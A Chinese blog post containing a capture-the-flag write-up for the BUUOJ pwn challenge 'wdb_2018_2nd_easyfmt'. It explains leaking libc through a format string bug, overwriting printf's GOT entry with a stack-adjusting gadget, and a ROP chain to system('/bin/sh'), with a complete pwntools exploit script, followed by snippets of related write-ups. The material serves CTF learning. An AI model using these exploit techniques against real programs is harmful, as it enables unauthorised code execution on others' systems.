buuoj刷题记录 - wdb_2018_2nd_easyfmt

最新推荐文章于 2023-09-30 16:48:40 发布
最新推荐文章于 2023-09-30 16:48:40 发布
阅读量264 收藏
点赞数
分类专栏: pwn入门 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34010404/article/details/123761772
版权

程序很简单,while(1)反复利用fmt漏洞:
在这里插入图片描述
泄露libc地址:

main函数是由__libc_start_main函数调用的,所以main执行时,ebp下面那个就是__libc_start_main中的地址,而__libc_start_main函数是位于libc中的,利用printf把返回地址打出来就可以泄露libc基址了.

之后便可以劫持got了,直接改printf为system得需要修改4个字节,打远程还是算了,这里提供另一种方法.

把printf的got改为某个gadget,这个gadget需要满足:

1.可以调整esp的值,(增大,这样就不会ret原来地址了)
2.在printf附近,只需要修改两个字节就行(但还是得爆破1个十六进制位)

先看一下printf地址:
在这里插入图片描述
找一个0x00049___的gadget,看了一下确实存在.
在这里插入图片描述
esp增加了几十个字节,可以绕过返回地址,最后ret到buff中执行我们自己布置的rop链。

注意事项:

libc地址我们只能确定低三个十六进制位是0,如果我们就按照0x0004913d来修改got
的低两个字节,那么必须爆破直到满足libc低两字节为0的情况.

exp:

from pwn import*
#sh = process('./pwn')
elf = ELF('./pwn')
while True:
    sh = remote('node4.buuoj.cn',27502)
    sh.recvuntil(b'Do you know repeater?\n')
    sh.send(b"%35$p\x00")
    libc_base = int(sh.recvline()[:-1],16) - 0x18637
    log.success('libc_base: %x',libc_base)
    if (libc_base&0xffff) != 0:
        sh.close()
        continue

    system = libc_base + 0x0003a940
    bin_sh = libc_base + 0x0015902B
    gadget = 0x0004913d
    fmt = (b'%%%du%%10$hn'%(gadget&0xffff)).ljust(16,b'\x00') + p32(elf.got['printf'])
    print(fmt)
    sh.send(fmt.ljust(100,b'\x00'))
    #
    log.success('system:%x \nbin_sh:%x \n',system,bin_sh)
    #gdb.attach(sh)
    payload = p32(0) * 4 + p32(system) + p32(elf.symbols['main']) + p32(bin_sh)
    sh.send(payload.ljust(100,b'\x00'))
    sh.recvline()
    sh.interactive()

爆破几秒钟,成功getshell:
在这里插入图片描述

Suspend.
关注
专栏目录
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 438
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
BUUCTF-PWN刷题记录-21
weixin_44145820的博客
05-15 685
目录wdb_2018_1st_babyheap(unlink, UAF) wdb_2018_1st_babyheap(unlink, UAF) add的大小固定为0x20 edit机会只有三次 指针悬挂 利用思路如下: 进行几次添加 add(0, (p64(0)+p64(0x31))*2) add(1, 'aaa\n') add(2, 'aaa\n') add(3, 'aaa\n') add(4, '/bin/sh\n') 删除0和1,再删除一次0,此时show(0)能泄露出heap的地址
wdb_2018_2nd_easyfmt
最新发布
qq_62887641的博客
09-30 638
32位只开了NX这题get到一点小知识(看我exp就知道了程序很简单,格式化字符串漏洞,并且无限使用没有system函数。
[BUUCTF-pwn]——wdb_2018_2nd_easyfmt
Y_peak的博客
03-17 683
[BUUCTF-pwn]——wdb_2018_2nd_easyfmt 一个简单的格式化字符串利用问题 泄露出got表地址,找到libc基地址 寻找system的实际地址 将printf_got修改为system的地址 写入”/bin/sh" exploit from pwn import * from LibcSearcher import * context.log_level = "debug" p = remote('node3.buuoj.cn',25125) #p = process("./
wdb_2018_2nd_easyfmt详解
像初雪一样自由洒落
04-25 1709
wdb_2018_2nd_easyfmt详解 自己做出来了,,,,还看其他人的 参考:wdb_2018_2nd_easyfmt 程序流程 程序流程非常简单,可以一直进行格式化字符串漏洞。 漏洞利用 首先通过格式化字符串泄露栈信息 通过格式化字符串修改printf_got表为system(one_gadget本地打通了,远程没有,,) 发送“/bin/sh\x00”, 详细过程 0.查看基本信息 32位程序,只开了nx winter@ubuntu:~/buu$ file wdb_2018_2nd_e.
WDB.zip_vxworks WDB组件_vxworks wdb_wdb
09-22
WDB,全称为Wind River Debug Bridge,是VxWorks系统中一个重要的组件,它提供了强大的远程调试功能,允许开发者在主机上对目标系统的VxWorks应用进行调试。 VxWorks WDB组件的核心功能包括: 1. **远程调试**:...
Leader统帅KFR-72LW_02WDB81TU1空调说明书.pdf
02-13
Leader统帅品牌说明书
GPIO.rar_STM8-GPIO_stm8
09-21
3. `mygpio.dep`、`mygpio.pdb`、`mygpio.stp`、`mygpio.stw`、`mygpio.wdb`、`mygpio.wed`:这些文件是编译和调试过程中的中间文件,它们包含了编译依赖关系、程序数据库、调试信息等,对于理解编译过程和进行调试...
[BUUCTF]REVERSE——wdb_2018_2nd_easyfmt(32位格式化字符串修改got表)
mcmuyanga的博客
03-08 903
wdb_2018_2nd_easyfmt 附件 步骤 例行检查,32位程序,开启了nx 本地试运行一下,看看大概的情况,看交互式的情况,知道存在格式化字符串漏洞 32位ida载入 利用思路: 找到格式化字符的偏移量 打印print@got的地址,泄露libc,计算system的地址 将print@got修改成system,传入参数‘/bin/bash\x00’ 利用过程: 找到偏移为6 打印print@got的地址 printf_got=elf.got["printf"] payloa
BUUCTF(pwn)wdb_2018_2nd_easyfmt
半岛铁盒的博客
04-03 513
32位格式化字符串修改got表 做题思路 找到格式化字符的偏移量 打印print@got的地址,泄露libc,计算system的地址 将print@got修改成system,传入参数‘/bin/sh\0’ from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',29087) elf=ELF('./1') printf_got=elf.got['printf'] payload1=p32(printf_got)+"%6$s"
BUUCTF刷题5
m0_51251108的博客
10-30 561
题目:axb_2019_heap:actf_2019_babystack:picoctf_2018_got_shell:[极客大挑战 2019]Not Bad:gyctf_2020_force:picoctf_2018_can_you_gets_me:mrctf2020_easy_equation:wdb_2018_2nd_easyfmt:ciscn_2019_es_1:axb_2019_fmt64: axb_2019_heap: 参考师傅:buuctf axb_2019_heap_R1nd0的博客-CSD
wdb_2018_4th_pwn2(爆破随机数为0)
seaaseesa的博客
07-24 685
wdb_2018_4th_pwn2(爆破随机数为0) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,功能1栈溢出,但是有canary 功能3格式化字符串,当仅能泄露一个值。 功能2是一个递归调用,多次递归,可以在栈里多处位置留下canary的值 功能9011也是一个栈溢出,但是需要正确的key才能进行。 可以使用功能3泄露libc地址,然后功能2递归多次,再使用功能1将canary的值泄露,最后通过爆破随机数,用9011功能来进行栈溢出做ROP。 随机数可以直接
2018网(PWN)鼎杯第一场解题记录(Writeup)
热门推荐
SWEET0SWAT的博客
08-21 1万+
MISC   clip     使用十六进制查看软件打开,查找的过程中发现有idat头:       还有一处在下方,表示还有另一张图片      但是这里缺少头部需要手动补充上去再另存文件:      一共提取出两张图片,但是图片明显被处理过了         其实不明白出题人为什么要弄成这样,CTF比赛还要弄成这样纯粹就是刁难,弄得眼睛贼疼。   minified...
BUUCTF之“axb_2019_fmt64”
Probeginner的博客
12-15 3257
64位下格式化字符串漏洞,内存地址任意写
buuctf (网鼎杯)wdb_2018_3rd_pesp realloc_hook, unlink,写入bss段3种方法记录
carol2358的博客
05-14 1287
写了一道2018网鼎的heap,漏洞挺多,尝试了3中方法解题,也算是对目前heap的学习进度的总结吧 题目本身是一道常规heap题,pie和got保护都没开,可以改写got表 ①realloc_hook的做法: 先贴exp,然后慢慢解释 exp: from pwn import * from LibcSearcher import * local_file = './wdb_2018_3rd_pesp' local_libc = '/lib/x86_64-linux-gnu/libc-2.23
怎么把vivao2018.2波形生成的WDB文件导出来
03-29
要将Vivado 2018.2波形生成的WDB文件导出,请按照以下步骤进行操作: 1. 在Vivado中打开波形文件。 2. 点击“File”菜单并选择“Write Waveform Data”。 3. 在弹出的“Write Waveform Data File”对话框中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Suspend.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值